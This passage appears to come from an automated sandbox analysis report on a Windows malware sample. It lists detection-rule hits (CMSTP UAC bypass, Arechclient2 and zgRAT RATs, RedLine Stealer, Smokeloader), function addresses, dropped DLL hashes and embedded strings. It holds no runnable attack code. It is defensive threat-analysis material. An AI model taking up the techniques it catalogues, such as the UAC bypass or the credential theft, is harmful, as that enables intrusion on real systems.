                          Source: 2.2.run.exe.26ccd5b.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 20.2.run.exe.3e1e15b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 4.2.cmd.exe.580fe64.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 21.2.cmd.exe.4b5c264.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 4.2.cmd.exe.62500c8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                          Source: 21.2.cmd.exe.51400c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                          Source: 21.2.cmd.exe.51400c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                          Source: 2.2.run.exe.26cc15b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 4.2.cmd.exe.57cb976.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 2.2.run.exe.268886d.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 4.2.cmd.exe.62500c8.8.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                          Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 20.2.run.exe.3dda86d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 24.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                          Source: 4.2.cmd.exe.580f264.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 21.2.cmd.exe.4b5ce64.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 20.2.run.exe.3e1ed5b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 21.2.cmd.exe.4b18976.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\xtfky, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\jwjqeqx, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB7F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6BB7F280
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBDB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,1_2_6BBDB910
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBDB8C0 rand_s,NtQueryVirtualMemory,1_2_6BBDB8C0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBDB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6BBDB700
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB9ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,1_2_6BB9ED10
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_004278800_2_00427880
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0040B8AE0_2_0040B8AE
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0040C1910_2_0040C191
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_004123A00_2_004123A0
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0040F4410_2_0040F441
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0040C44C0_2_0040C44C
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0042140C0_2_0042140C
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0040BC200_2_0040BC20
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0041BE390_2_0041BE39
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0040BECA0_2_0040BECA
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_004087610_2_00408761
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0041B7220_2_0041B722
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0040C7FC0_2_0040C7FC
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B6C6B30_2_05B6C6B3
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B6F6A80_2_05B6F6A8
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B6BE870_2_05B6BE87
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B726070_2_05B72607
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B7B9890_2_05B7B989
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B689C80_2_05B689C8
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B6C1310_2_05B6C131
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B6C3F80_2_05B6C3F8
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B6BB150_2_05B6BB15
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B6CA630_2_05B6CA63
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB735A01_2_6BB735A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB7F3801_2_6BB7F380
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBE53C81_2_6BBE53C8
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBBD3201_2_6BBBD320
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB8C3701_2_6BB8C370
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB753401_2_6BB75340
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB8CAB01_2_6BB8CAB0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBE2AB01_2_6BBE2AB0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB722A01_2_6BB722A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBA4AA01_2_6BBA4AA0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBEBA901_2_6BBEBA90
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB91AF01_2_6BB91AF0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBBE2F01_2_6BBBE2F0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBB8AC01_2_6BBB8AC0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBB9A601_2_6BBB9A60
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBAD9B01_2_6BBAD9B0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB7C9A01_2_6BB7C9A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBB51901_2_6BBB5190
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBD29901_2_6BBD2990
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBCB9701_2_6BBCB970
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBEB1701_2_6BBEB170
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB8D9601_2_6BB8D960
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB9A9401_2_6BB9A940
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBA60A01_2_6BBA60A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB9C0E01_2_6BB9C0E0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBB58E01_2_6BBB58E0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBE50C71_2_6BBE50C7
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBBB8201_2_6BBBB820
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBC48201_2_6BBC4820
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB878101_2_6BB87810
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBBF0701_2_6BBBF070
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB988501_2_6BB98850
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB9D8501_2_6BB9D850
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBC77A01_2_6BBC77A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBA6FF01_2_6BBA6FF0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB7DFE01_2_6BB7DFE0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBB77101_2_6BBB7710
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB89F001_2_6BB89F00
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBD4EA01_2_6BBD4EA0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB95E901_2_6BB95E90
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBDE6801_2_6BBDE680
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB7BEF01_2_6BB7BEF0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB8FEF01_2_6BB8FEF0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBE76E31_2_6BBE76E3
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBD9E301_2_6BBD9E30
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBB7E101_2_6BBB7E10
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBC56001_2_6BBC5600
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB7C6701_2_6BB7C670
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBE6E631_2_6BBE6E63
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB99E501_2_6BB99E50
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBB3E501_2_6BBB3E50
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBC2E4E1_2_6BBC2E4E
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB946401_2_6BB94640
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBD85F01_2_6BBD85F0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBB0DD01_2_6BBB0DD0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBA05121_2_6BBA0512
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB9ED101_2_6BB9ED10
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB8FD001_2_6BB8FD00
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBD34A01_2_6BBD34A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBDC4A01_2_6BBDC4A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB86C801_2_6BB86C80
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBB6CF01_2_6BBB6CF0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB7D4E01_2_6BB7D4E0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB9D4D01_2_6BB9D4D0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB864C01_2_6BB864C0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBE542B1_2_6BBE542B
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBB5C101_2_6BBB5C10
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBC2C101_2_6BBC2C10
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBEAC001_2_6BBEAC00
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBE545C1_2_6BBE545C
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB854401_2_6BB85440
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C85ECD01_2_6C85ECD0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8C6C001_2_6C8C6C00
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8DAC301_2_6C8DAC30
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C7FECC01_2_6C7FECC0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C80AC601_2_6C80AC60
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C896D901_2_6C896D90
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C804DB01_2_6C804DB0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C98CDC01_2_6C98CDC0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C988D201_2_6C988D20
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C92AD501_2_6C92AD50
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8CED701_2_6C8CED70
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C886E901_2_6C886E90
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C80AEC01_2_6C80AEC0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8A0EC01_2_6C8A0EC0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8E0E201_2_6C8E0E20
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C89EE701_2_6C89EE70
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C948FB01_2_6C948FB0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C80EFB01_2_6C80EFB0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C800FE01_2_6C800FE0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8DEFF01_2_6C8DEFF0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C806F101_2_6C806F10
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C940F201_2_6C940F20
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C86EF401_2_6C86EF40
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8C2F701_2_6C8C2F70
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C9068E01_2_6C9068E0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8508201_2_6C850820
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C88A8201_2_6C88A820
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8D48401_2_6C8D4840
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8909A01_2_6C8909A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8BA9A01_2_6C8BA9A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8C09B01_2_6C8C09B0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C91C9E01_2_6C91C9E0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8349F01_2_6C8349F0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8569001_2_6C856900
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_0018F8402_2_0018F840
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001740602_2_00174060
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001961302_2_00196130
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001721202_2_00172120
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_0018B1502_2_0018B150
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001C9A002_2_001C9A00
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001BCAA02_2_001BCAA0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001843902_2_00184390
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001903902_2_00190390
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_0019FC102_2_0019FC10
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001C55502_2_001C5550
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_0017D5702_2_0017D570
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_0017A6F02_2_0017A6F0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001966F02_2_001966F0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001C96E02_2_001C96E0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001737B02_2_001737B0
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: String function: 6BBACBE8 appears 134 times
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: String function: 004043B0 appears 316 times
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: String function: 6C9809D0 appears 79 times
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: String function: 6BBB94D0 appears 90 times
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: String function: 002F9D36 appears 33 times
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: String function: 001714F0 appears 60 times
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: String function: 00171930 appears 76 times
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: String function: 00171900 appears 31 times
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: String function: 00171310 appears 36 times
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: String function: 05B69F27 appears 48 times
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: String function: 05B87A73 appears 43 times
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: String function: 00409CC0 appears 48 times
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: String function: 0042780C appears 43 times
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1564
                          Source: wxfSIz4PAi.exe, 00000000.00000002.1986225613.000000000415E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFirezer0 vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1779362070.0000000005E0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1780069248.0000000005E17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1779989651.0000000005E35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000002.1986931199.0000000005DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1778778577.0000000005E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1780363019.0000000005E1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1767099442.0000000005E1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1779706240.0000000005E35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \OriginalFileName vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1773466562.0000000005E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1779826045.0000000005E01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000002.1985478650.0000000004048000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirezer0 vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1663398442.0000000005D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFirezer0 vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1779436882.0000000005E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1779911355.0000000005E0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1773175262.0000000005E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1778318773.0000000005E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1776717405.0000000005E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1779208680.0000000005E01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1778916335.0000000005E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
